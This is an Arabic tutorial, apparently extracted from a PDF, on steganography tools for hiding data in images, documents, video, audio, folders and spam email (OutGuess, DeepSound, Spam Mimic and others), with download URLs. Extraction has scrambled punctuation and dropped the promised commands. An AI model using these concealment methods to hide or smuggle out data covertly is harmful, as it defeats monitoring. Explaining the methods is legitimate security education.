Stegھو ﻣﻧﺻﺔ ﺑرﻣﺟﯾﺎت ﻣﺣﻣوﻟﺔ ،ﻛﺗب ﻓﻲ . C + +ﺗﺳﺗﺧدم ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت واﻟﺗﺷﻔﯾر ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت داﺧل اﻟﺻور ﺳواء اﻟﻐﯾر
ﻣﺿﻐوطﺔ واﻟﻣﺿﻐوطﺔ وﯾدﻋم اﻟﻌدﯾد ﻣن ﺻﯾﻎ اﻟﺻور) .BMP ،PNG ،TIFF ،JPEG (JPGﻣﻊ ﺳﮭوﻟﺔ واﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ ﻓﺎﻧﮫ
ﻣن اﻟﻣﻣﻛن ﺗﺣدﯾد ﻣﻌﺎﯾر إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ،ﺗﻘﯾﯾم اﻟﺻورة اﺳﺗﺧدام ﻛل ﻣن ﻣﻔﺗﺎح اﻟﺗﺷﻔﯾر اﻟﻣﺗﻣﺎﺛل وﻣﻔﺗﺎح اﻟﺗﺷﻔﯾر اﻟﻐﯾر ﻣﺗﻧﺎظر .ﯾﻣﻛن إﺧﻔﺎء
اﻟﺑﯾﺎﻧﺎت ﻛﺄﻧﮫ ﻣﻠف أرﺷﯾف ﻣﺿﻐوط ،وأﻧﮫ ﻣن اﻟﻣﻣﻛن أﯾﺿﺎ أن ﺗﺿﯾف ﺗﻌﻠﯾﻘﺎ.
Stegﯾﻌﻣل ﻋﻠﻰ ﺟﻧو /ﻟﯾﻧﻛس ،ﻣﺎﯾﻛروﺳوﻓت وﯾﻧدوز وأﺑل ﻣﺎك ، OS Xوﯾﻣﻛﻧك ﺗﺣﻣﯾل اﻟﺑرﻧﺎﻣﺞ ﻣﺑﺎﺷرة ﻣن اﻟﻣوﻗﻊ اﻟرﺳﻣﻲ.
ﺑﻣﺟرد ﺗﺛﺑﯾﺗﮫ ﯾﻣﻛﻧك ﺗﺷﻐﯾﻠﮫ وﺳﺗرى ﺷﯾﺋﺎ ﻣﺷﺎﺑﮭﺎ ﻟﮭذه اﻟﺻورة:
OutGuess -3
OutGuessھو أداة ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻋﺎﻟﻣﯾﺔ واﻟﺗﻲ ﺗﺗﯾﺢ إدﺧﺎل اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ ﻓﻲ اﻟﺑت زاﺋدة ﻣن ﻣﺻﺎدر اﻟﺑﯾﺎﻧﺎت .طﺑﯾﻌﺔ ﻣﺻدر اﻟﺑﯾﺎﻧﺎت
ﻻ ﯾﻣت ﺑﺻﻠﺔ اﻟﻰ ﺟوھر .OutGuessﯾﻌﺗﻣد اﻟﺑرﻧﺎﻣﺞ ﻋﻠﻰ ﻣﻌﺎﻟﺟﺎت ﺑﯾﺎﻧﺎت ﻣﺣددة اﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ أن اﺳﺗﺧراج اﻟﺑﺎﯾت اﻟﻔﺎﺋﺿﺔ واﻟﻛﺗﺎﺑﺔ
ﻋﻠﯾﮭﺎ ﺛم ارﺟﺎﻋﮭﺎ ﻣرة أﺧرى ﺑﻌد اﻟﺗﻌدﯾل .ﺣﺎﻟﯾﺎ ﯾدﻋم PPMو PNMو) JPGﺻﯾﻐﮫ ﺻوره( ،أﯾﺿل OutGuessﯾﻣﻛﻧﮫ اﺳﺗﺧدام أي ﻧوع
ﻣن اﻟﺑﯾﺎﻧﺎت ،طﺎﻟﻣﺎ ﺗم ﺗوﻓﯾر اﻟﻣﻌﺎﻟﺞ.
OutGuessﯾﺳﺗﺧدم generic iterator objectﻟﺗﺣدﯾد أي ﻣن ﺑﺗﺎت اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺟب أن ﯾﺗم ﺗﻌدﯾﻠﮭﺎ .و seedﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﺗﻌدﯾل
ﺳﻠوك .iteratorﯾﻘوم ﺑﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ ﺑﻘﯾﺔ اﻟرﺳﺎﻟﺔ .ﻋن طرﯾﻖ ﺗﻐﯾﯾر OutGuess ،seedﯾﺣﺎل إﯾﺟﺎد ﺗﺳﻠﺳل ﻣن
اﻟﺑﺗﺎت واﻟذي ﯾﻘﻠل ﻋدد اﻟﺗﻐﯾﯾرات ﻓﻲ اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗﻌﯾن اﻟﻘﯾﺎم ﺑﮭﺎ.
ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك OutGuess ،ﯾﺳﻣﺢ ﺑﺈﺧﻔﺎء رﺳﺎﻟﺗﯾن ﻓﻲ اﻟﺑﯾﺎﻧﺎت .ﯾﺣﺗﻔظ ﺑﺎﻟﺑﺗﺎت اﻟﺗﻲ ﺗم ﺗﻌدﯾﻠﮭﺎ ﻣﺳﺑﻘﺎ وﯾﺣﺻرھﺎ.
ﻟﺗﺷﻔﯾر ﻣﺣﺗوى ﻧﺳﺗﺧدم اﻻﺗﻲ:
ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام ) (-Kﺛم اﻟرﺳﺎﻟﺔ ﺑﯾن ﻋﻼﻣﺗﻲ ﺗﻧﺻﯾص ﻹﺿﺎﻓﺔ رﺳﺎﻟﺔ ﺳرﯾﮫ أﺧرى.
ﻟﻔك ﺗﺷﻔﯾر ﻣﺣﺗوى ﻧﺳﺗﺧدم اﻻﺗﻲ:
Document Steganography
ﻣﺛل طرﯾﻘﺔ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟﺻور ،إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟوﺛﯾﻘﺔ ھو أﺳﻠوب ﯾﺳﺗﺧدم ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻋﻠﻰ أن ﯾﺗم ﺗﺣوﯾﻠﮭﺎ
ﻓﻲ اﻟوﺛﺎﺋﻖ .ﯾوﺿﺢ اﻟرﺳم اﻟﺑﯾﺎﻧﻲ اﻟﺗﺎﻟﻲ ﻋﻣﻠﯾﺔ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟوﺛﯾﻘﺔ:
اﻟﻣﺻدرhttp://wbstego.wbailer.com :
Wbstegoھو أداة إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻓﻲ ﻣﺳﺗﻧد .ﺑﺎﺳﺗﺧدام ھذه اﻷداة ،ﯾﻣﻛﻧك إﺧﻔﺎء أي ﻧوع ﻣن اﻟﻣﻠﻔﺎت ﺿﻣن أﻧواع اﻟﻣﻠﻔﺎت اﻟﻧﺎﻗﻠﺔ ﻣﺛل
Windows bitmapsﻣﻊ اﻷﻟوان 16و 256و ،16.7mاﻟﻣﻠﻔﺎت اﻟﻧﺻﯾﺔ ﻣن اﻟﻧوع ASCIIأو ANSIوﺣﻘول HTMLوﻣﻠﻔﺎت
.Adobe PDF
Video Steganography
Video steganographyﯾﻧطوي ﻋﻠﻰ إﺧﻔﺎء رﺳﺎﺋل اﻟﻣﻠﻔﺎت اﻟﺳرﯾﺔ ﻣﻊ أي ﻣن اﻣﺗدادات ﻣﻠف اﻟﻔﯾدﯾو اﻟﻣﺗدﻓﻘﺔ ﺑﺎﺳﺗﻣرار .ﯾﺗم اﺳﺗﺧدام
ﻣﻠﻔﺎت اﻟﻔﯾدﯾو ھﻧﺎ ﺑﺎﻋﺗﺑﺎرھﺎ اﻟﻧﺎﻗل ﻟﺗﺣﻣل اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ .ﻓﺈﻧﮫ ﯾﺣﺗﻔظ ﺑﺎﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك أﻛﺛر أﻣﻧﺎ .ﻣﻠﻔﺎت اﻟﻔﯾدﯾو اﻟﻧﺎﻗﻠﺔ ھو
ﻋﺑﺎره ﻋن ﺗﯾﺎر ﻣﺗﺣرك ﻣن اﻟﺻور واﻟﺻوت ،ﻓﺈﻧﮫ ﻣن اﻟﺻﻌب ﻟﻠﻣﺗﻠﻘﻲ ﻏﯾر اﻟﻣﻘﺻودة ﻣﻼﺣظﺔ اﻟﺗﺷوﯾش ﻓﻲ ﻣﻠف اﻟﻔﯾدﯾو اﻟﻧﺎﺟﻣﺔ ﺑﺳﺑب
اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ .ﺣﯾث أﻧﮫ ﯾﻛون ﺑدون ﻣراﻗﺑﺔ ﺑﺳﺑب اﺳﺗﻣرار ﺗدﻓﻖ اﻟﻔﯾدﯾو .ﻣﻠف ﻓﯾدﯾو ھو ﻣزﯾﺞ ﻣن اﻟﺻورة واﻟﺻوت ،وﺟﻣﯾﻊ اﻟﺗﻘﻧﯾﺎت
اﻟﻣﺗﺎﺣﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟﺻور او ﺑداﺧل اﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ ﯾﻣﻛن ﺗطﺑﻘﮭﺎ أﯾﺿﺎ ﻋﻠﻰ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻔﯾدﯾو .وﯾﻣﻛن اﺳﺗﺧداﻣﮫ
ﻹﺧﻔﺎء ﻋدد ﻛﺑﯾر ﻣن اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ.
Video Steganography: OmniHide PRO
اﻟﻣﺻدرhttp://omnihide.com :
OmniHide PROﯾﺳﻣﺢ ﻟك ﺑﺈﺧﻔﺎء أي ﻣﻠف ﺳري داﺧل ﺻورة ﻏﯾر ﺿﺎره ،ﻓﯾدﯾو ،ﻣﻠﻔﺎت اﻟﻣوﺳﯾﻘﻰ ،وﻣﺎ اﻟﻰ ذﻟك .اﻟﻣﻠف اﻟﻧﺎﺗﺞStego
ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ أو ﻣﺷﺎرﻛﺗﮭﺎ ﻋﺑر اﻟﺷﺑﻛﺔ ﻣﺛل اﻟﻣﻠﻔﺎت اﻟﻌﺎدﯾﺔ دون أن ﯾﻌﻠم أﺣد أن ﺷﯾﺋﺎ ﻣﺧﻔﯾﺎ ﺑداﺧﻠﮭﺎ ،وﺑﺎﻟﺗﺎﻟﻲ ﺗﻣﻛن ھذه اﻷداة ﺑﺣﻔظ اﻟﻣﻠف
اﻟﺳري اﻟﺧﺎص ﺑك ﻣن أﻋﯾن اﻟﻣﺗطﻔﻠﯾن .ﻓﺈﻧﮫ ﯾﺗﯾﺢ ﻟك أﯾﺿﺎ إﺿﺎﻓﺔ ﻛﻠﻣﺔ ﻣرور ﻹﺧﻔﺎء اﻟﻣﻠﻔﺎت اﻟﺧﺎﺻﺔ ﺑك ﻟﺗﻌزﯾز اﻷﻣن.
اﻟﻣﻣﯾزات:
-ﯾﺳﻣﺢ ﻟك إﺧﻔﺎء اﻟﻣﻠﻔﺎت اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﻠﻔﺎت اﻟﺻور ،أﻓﻼم ،اﻟﻣﺳﺗﻧدات ،واﻟﻣوﺳﯾﻘﻰ اﻟﺦ.
-ﻟم ﺗﺿﻊ أي ﻣن اﻟﻘﯾود ﻋﻠﻰ ﻧوع اﻟﻣﻠف واﻟﺣﺟم اﻟذي ﺗرﯾد إﺧﻔﺎءه.
ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ اﻟﺗطﺑﯾﻖ ،PROﻓﮭﻧﺎك اﻟﻌدﯾد ﻣن اﻷدوات اﻷﺧرى اﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء ﻣﻠف اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ
ﻣﻠﻔﺎت اﻟﻔﯾدﯾو:
Our Secret available at http://www.securekit.net
RT Steganography available at http://rtstegvideo.sourceforge.net
Masker available at http://www.softpuls.com
Max File Encryption available at http://www.softeza.com
MSU Stegovideo available at http://www.compression.ru
BDV DataHider available at http://www.bdvnotepad.com
Stegostick available at http://sourceforge.net
OpenPuff available at http://embeddedsw.net
Stegsecret available at http://stegsecret.sourceforge.net
PSM Encryptor available at http://www.softpedia.com/get/Security/Encrypting/PSM-Encryptor.shtml
Audio Steganography
Audio steganographyﯾﺳﻣﺢ ﻟك ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﻠف اﻟﺻوت ﻣﺛل ،AU ، WAVوﺣﺗﻰ ﻣﻠﻔﺎت MP3
اﻟﺻوﺗﯾﺔ .ﻓﺈﻧﮫ ﯾﺿﻣن اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻓﻲ اﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ ﻋن طرﯾﻖ ﺗﻐﯾﯾر طﻔﯾف ﻓﻲ ﺗﺳﻠﺳل ﺛﻧﺎﺋﻲ ﻣن اﻟﻣﻠف اﻟﺻوﺗﻲ .اﻟﺗﻐﯾﯾرات ﻓﻲ
اﻟﻣﻠف اﻟﺻوﺗﻲ ﺑﻌد اﻹدراج ﻻ ﯾﻣﻛن أن ﯾﺗم ﻛﺷﻔﮭﺎ ،ﻟذﻟك ھذا ﯾؤﻣن اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻣن أﻋﯾن اﻟﻣﺗطﻔﻠﯾن.
ﺗﺣﺗﺎج إﻟﻰ اﻟﺗﺄﻛد ﻣن أن اﻟﻣﻠف اﻟﺻوﺗﻲ اﻟﻧﺎﻗل ﻻ ﯾﻧﺑﻐﻲ أن ﯾﺗدھور ﺑﺷﻛل ﻛﺑﯾر ﺑﺳﺑب اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ اﻟﻣدﻣﺟﺔ؛ ﻋﻠﻰ اﻟﺟﺎﻧب اﻻﺧر ،ﯾﻣﻛن
) eavesdropperاﻟﻣﺗﻧﺻت( ﻣن اﻟﻛﺷف ﻋن وﺟود رﺳﺎﻟﺔ ﺳرﯾﮫ ﻣﺧﺑﺄه ﻓﻲ اﻟﻣﻠف اﻟﺻوﺗﻲ .ﻟذﻟك ﯾﺟب ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ ﺑطرﯾﻘﮫ ﻣﺎ
ﺑﺣﯾث ﯾﻛون ھﻧﺎك ﺗﻐﯾﯾرا طﻔﯾﻔﺎ ﻓﻲ اﻟﻣﻠف اﻟﺻوﺗﻲ اﻟذي ﻻ ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮭﺎ ﻣن ﻗﺑل اﻹﻧﺳﺎن .ﯾﻣﻛن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻓﻲ اﻟﻣﻠف اﻟﺻوﺗﻲ
ﺑﺎﺳﺗﺧدام LSBأو ﺑﺎﺳﺗﺧدام ﺗرددات اﻟﺗﻲ ھﻲ ﻏﯾر ﻣﺳﻣوﻋﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻸذن اﻟﺑﺷرﯾﺔ ).(>20,000Hz
ھﻧﺎك ﺑﻌض اﻟطرق اﻟﻣﺗﺎﺣﺔ ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﻠﻔﺎت اﻟﺻوت .ﺑﻌض اﻷﺳﺎﻟﯾب ﺗﻘوم ﺑﺗﻧﻔﯾذ اﻟﺧوارزﻣﯾﺔ اﻟﺗﻲ ﺗﻘوم ﻋﻠﻰ
إدﺧﺎل اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻋﻠﻰ ﺷﻛل إﺷﺎرة اﻟﺿوﺿﺎء) ، (noise signalﺑﯾﻧﻣﺎ اﻟﺑﻌض اﻻﺧر ﯾﺳﺗﺧدم أﺳﺎﻟﯾب أﺧرى ﻓﻲ exploiting
)اﺧﺗراق( ﺗﻘﻧﯾﺎت ﻣﻌﺎﻟﺟﺔ اﻹﺷﺎرات اﻟﻣﺗطورة ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت.
ﺗﺳﺗﺧدم اﻷﺳﺎﻟﯾب اﻟﺗﺎﻟﯾﺔ ﻟﺗﻧﻔﯾذ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻓﻲ ﻣﻠﻔﺎت اﻟﺻوت:
ﻟﻠﻐﺎﯾﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺗﻧﺻت اﻟﻛﺷف ﻋن اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻣن إﺷﺎرة اﻟﺻوت .ﯾﺳﺎﻋد ھذا اﻷﺳﻠوب ﻟﺗﺟﻧب اﻟﮭﺟﻣﺎت ﻣﺛل )(low-pass filtering
واﻗﺗطﺎع اﻟﺑﺎﯾت). (bit truncation
ﺑراﻣﺞ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳﻣﻌﯾﺔ ﺗﻧﻔذ واﺣدة ﻣن ھذه اﻟطرق ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ ﻓﻲ ﻣﻠﻔﺎت اﻟﺻوت.
Phase Encoding -5
Phase codingﯾﺗم وﺻﻔﮫ ﺑﺄﻧﮫ اﻟﻣرﺣﻠﺔ اﻟﺗﻲ ﯾﺗم ﻓﯾﮭﺎ اﺳﺗﺑدال ﺷرﯾﺣﺔ اﻟﺻوت اﻷوﻟﯾﺔ ﺑﺎﻟﻣرﺣﻠﺔ اﻟﻣرﺟﻌﯾﺔ اﻟﺗﻲ ﺗﻣﺛل اﻟﺑﯾﺎﻧﺎت .ﯾﻘوم ﺑﺗرﻣﯾز
ﺑﺗﺎت اﻟرﺳﺎﻟﺔ ﺳرﯾﺔ ﻛﺄﻧﮫ ﻣرﺣﻠﺔ اﻟﺗﺣوﯾﻼت ) (phase shiftﻓﻲ ﻣرﺣﻠﺔ اﻟطﯾف ) (phase spectrumﻓﻲ اﻻﺷﺎرة اﻟرﻗﻣﯾﺔ ،ﯾﺗم ﺗﺣﻘﯾﻖ
اﻟﺗرﻣﯾز ) (soft encodingﻣن ﺣﯾث ﻧﺳﺑﺔ اﻹﺷﺎرة إﻟﻰ اﻟﺿوﺿﺎء ).(signal-to-noise ratio
Audio Steganography: Deepsound
اﻟﻣﺻدرhttp://jpinsoft.net/DeepSound :
Deepsoundﯾﺳﺎﻋدك ﻋﻠﻰ إﺧﻔﺎء أي ﻧوع ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ ﻓﻲ اﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ) . (WAV and FLACﯾﻣﻛﻧك اﺳﺗﺧدام ھذه اﻷداة
ﻟﺗﺿﻣﯾن رﺳﺎﻟﺔ ﺳرﯾﮫ ﺧﺎﺻﺔ ﺑك ﻓﻲ اﻟﻣﻠف اﻟﺻوﺗﻲ .وﺳوف ﺗﺳﻣﺢ ﻟك أﯾﺿﺎ ﻻﺳﺗﺧراج اﻟﻣﻠﻔﺎت اﻟﺳرﯾﺔ ﻣﺑﺎﺷرة ﻣن ﻣﺳﺎرات ﻗرص اﻟﺻوت
) (Audio CD trackﻋﻧدﻣﺎ ﺗﻛون ﻓﻲ اﻟطرف اﻵﺧر .ﻛﻣﺎ أﻧﮭﺎ ﻗﺎدرة ﻋﻠﻰ ﺗﺷﻔﯾر اﻟﻣﻠﻔﺎت اﻟﺳرﯾﺔ ،وﺑﺎﻟﺗﺎﻟﻲ ﺗﻌزﯾز اﻷﻣن.
ﻟﻠوﺻول إﻟﻰ اﻟﺑﯾﺎﻧﺎت ﻓﻲ اﻟﻣﻠف اﻟﻧﺎﻗل ،ﯾﻣﻛﻧك ﺑﺑﺳﺎطﺔ اﺳﺗﻌرض اﻟﻣوﻗﻊ ﻣﻊ ﻣﺗﺻﻔﺢ ﻣﻠف Deepsoundﺛم اﻟﻧﻘر ﺑﺎﻟزر اﻷﯾﻣن ﻟﻠﻣﺎوس ﻓوق
اﻟﻣﻠف اﻟﺻوﺗﻲ ﻻﺳﺗﺧراج اﻟﻣﻠف اﻟﺳري اﻟﺧﺎص ﺑك.
ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام أدوات إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺻوﺗﯾﺔ اﻟﺗﺎﻟﯾﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﻠﻔﺎت اﻟﺻوت:
Mp3stegz available at http://sourceforge.net
MAXA Security Tools available at http://www.maxa-tools.com
BitCrypt available at http://bitcrypt.moshe-szweizer.com
MP3Stego available at http://www.petitcolas.net
Hide4PGP available at http://www.heinz-repp.onlinehome.de
CHAOS Universal available at http://safechaos.com
SilentEye available at http://www.silenteye.org
Quickcrypto available at http://www.quickcrypto.com
CryptArkan available at http://www.kuskov.com
Stegostick available at http://sourceforge.net
Folder Steganography
Folder steganographyﯾﺷﯾر إﻟﻰ إﺧﻔﺎء ﻣﻌﻠوﻣﺎت ﺳرﯾﺔ ﻓﻲ اﻟﻣﺟﻠدات .ھذا ﯾﻣﻛن أن ﯾﺗﺣﻘﻖ ﻣﻊ ﻣﺳﺎﻋدة ﻣن اﻷداة .Invisible Secrets 4
Folder Steganography: Invisible Secrets 4
اﻟﻣﺻدرhttp://www.invisiblesecrets.com :
Invisible Secrets 4ھو ﺑرﻧﺎﻣﺞ ﻟﺗﺷﻔﯾر اﻟﻣﻠﻔﺎت واﻟﺗﻲ ﺗﺣﺎﻓظ ﻋﻠﻰ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣن ﻣﺟرﻣﻲ اﻹﻧﺗرﻧت وﯾﻣﻧﻊ اﻟﻣﮭﺎﺟﻣﯾن ﻣن
اﻻطﻼع ﻋﻠﻰ اﻟﻣﻠﻔﺎت اﻟﺧﺎﺻﺔ ﺑك .ھذا اﻟﺑرﻧﺎﻣﺞ ﯾﻘوم ﺑﺗﺷﻔﯾر ﻟﯾس ﻓﻘط اﻟﺑﯾﺎﻧﺎت اﻟﺧﺎﺻﺔ واﻟﻣﻠﻔﺎت ﻟﺣﻔظﮭﺎ ﻓﻲ ﻣﻛﺎن آﻣن واﻟﻧﻘل اﻻﻣن ﻋﺑر
اﻟﺷﺑﻛﺔ ،وﻟﻛن أﯾﺿﺎ ﯾﺧﻔﯾﮭم ﻓﻲ ﻣﺛل ھذا اﻟﻣﻛﺎن ﺑﺣﯾث ﻻ أﺣد ﯾﺳﺗطﯾﻊ اﻟﺗﻌرف ﻋﻠﯾﮭﺎ .ﺣﺗﻰ اﻟﻣﮭﺎﺟم ﯾﺗﻌذر ﻓﻲ ﺗﺣدﯾد ﻣوﻗﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ.
ﻋﻧد وﺿﻊ اﻟوﺛﺎﺋﻖ اﻟﺧﺎﺻﺔ ﻓﺄﻧﮭﺎ ﺗظﮭر ﻛﺄﻧﮭﺎ ﻻ ﺷﻲء ﻣﮭم ،ﻣﺛل اﻟﺻور أو ﻣﻠﻔﺎت اﻟﺻوت أو ﺻﻔﺣﺎت اﻟوﯾب ،وھذه اﻷﻧواع ﻣن اﻟﻣﻠﻔﺎت ھﻲ
ﺗﻣوﯾﮫ ﻣﺛﺎﻟﻲ ﻟﺗﺧزﯾن ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ .ھذا اﻟﺑرﻧﺎﻣﺞ ﯾﺳﻣﺢ ﻟك ﺑﺗﺷﻔﯾر وإﺧﻔﺎء اﻟﻣﺳﺗﻧدات ﻣﺑﺎﺷرة ﻋن ﻣﺳﺗﻛﺷف اﻟوﯾﻧدوز ،وﻣن ﺛم
ﻧﻘﻠﮭﺎ آﻟﯾﺎ ﻋن طرﯾﻖ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ أو ﻋﺑر اﻹﻧﺗرﻧت.
ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ،Invisible Secrets 4ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام اﻷدوات اﻟﺗﺎﻟﯾﺔ ﻛﺄدوات folder steganographyﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت
اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﺟﻠدات:
Folder Lock available at http://www.newsoftwares.net
A+ Folder Locker available at http://www.giantmatrix.com
Toolwiz BSafe available at http://www.toolwiz.com
Hide Folders 2012 available at http://fspro.net
GiliSoft File Lock Pro available at http://www.gilisoft.com
Universal Shield available at http://www.everstrike.com
WinMend Folder Hidden available at http://www.winmend.com
Encrypted Magic Folders available at http://www.pc-magic.com
Quickcrypto available at http://quickcrypto.com
Max Folder Secure available at http://www.maxfoldersecure.com
Spam/Email Steganography
Spam/email steganographyﯾﺷﯾر إﻟﻰ ﺗﻘﻧﯾﺔ إرﺳﺎل اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻋن طرﯾﻖ إﺧﻔﺎﺋﮭﺎ ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد اﻟﻣزﻋﺟﺔ/اﻟﺑرﯾد
اﻹﻟﻛﺗروﻧﻲ .رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣزﻋﺟﺔ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﺑوﺻﻔﮭﺎ وﺳﯾﻠﺔ ﻟﻼﺗﺻﺎل اﻟﺳري ﻋن طرﯾﻖ دﻣﺞ اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﺑﻧﻔس
اﻟطرﯾﻘﺔ ،وإﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﻣﺿﻣﻧﺔ ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣزﻋﺟﺔ .ھذا اﻷﺳﻠوب ھو ﻣن اﻟﻣﻔﺗرض أن ﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل ﻣﺧﺗﻠف
اﻟوﻛﺎﻻت اﻟﻌﺳﻛرﯾﺔ ،ﻣﻊ ﻣﺳﺎﻋدة ﻣن ﺧوارزﻣﯾﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ .ھذا ﯾﻣﻛن ﺗﺣﻘﯾﻘﮫ ﻣﻊ ﻣﺳﺎﻋدة ﻣن اﻷداة .Spam Mimic
Spam/Email Steganography: Spam Mimic
اﻟﻣﺻدرhttp://www.spammimic.com :
Spam Mimicھو Spamﻟﻣﺣرك Mimicل .Peter Waynerﺣﯾث ﯾﻘوم ﺑﺗرﻣﯾز/ﺗﺷﻔﯾر اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد
اﻹﻟﻛﺗروﻧﻲ اﻟﻣزﻋﺟﺔ .اﻟﺷﻲء اﻟﻣﻣﺗﻊ ﻓﻲ ھذا اﻟﺑرﻧﺎﻣﺞ ھو اﻧﮫ ﯾﻘوم ﺑﺗرﻣﯾز اﻟرﺳﺎﻟﺔ اﻟﻰ ﻓن اﻟﻛﻼم واﻟﺗﻌﻠﯾﻘﺎت ﻓﻲ ﻟﻌﺑﺔ اﻟﺑﯾﺳﺑول .ﻓﺈﻧﮫ ﯾوﻓر
ﻗدرات ﻟﻛل ﻣن ﻓك اﻟﺗﺷﻔﯾر واﻟﺗرﻣﯾز .اﻟﺗرﻣﯾز/اﻟﺗﺷﻔﯾر ﻣن ﻗﺑل ھذه اﻷداة ﻋن طرﯾﻖ ﺗرﻣﯾز اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻛﺄﻧﮭﺎ رﺳﺎﻟﺔ ﻣزﻋﺟﮫ )(Spam
ﻣﻊ ﻛﻠﻣﺔ ﻣرور ،fake Russian ،fake PGP ،اﻟﻔﺿﺎء.
ﺑراﻣﺞ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻧﺻﯾﺔ ﺗﻘوم ﺑﺗﺣوﯾل اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ إﻟﻰ ﻋﻧﺎﺻر ﺣرﯾﺔ اﻟﺗﻌﺑﯾر اﻟﻣﻌرﻓﺔ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﻣﺛل .Play
Sams Big 6 Play Makerﯾﺳﺎﻋد ﻓﻲ أداء .natural text steganography
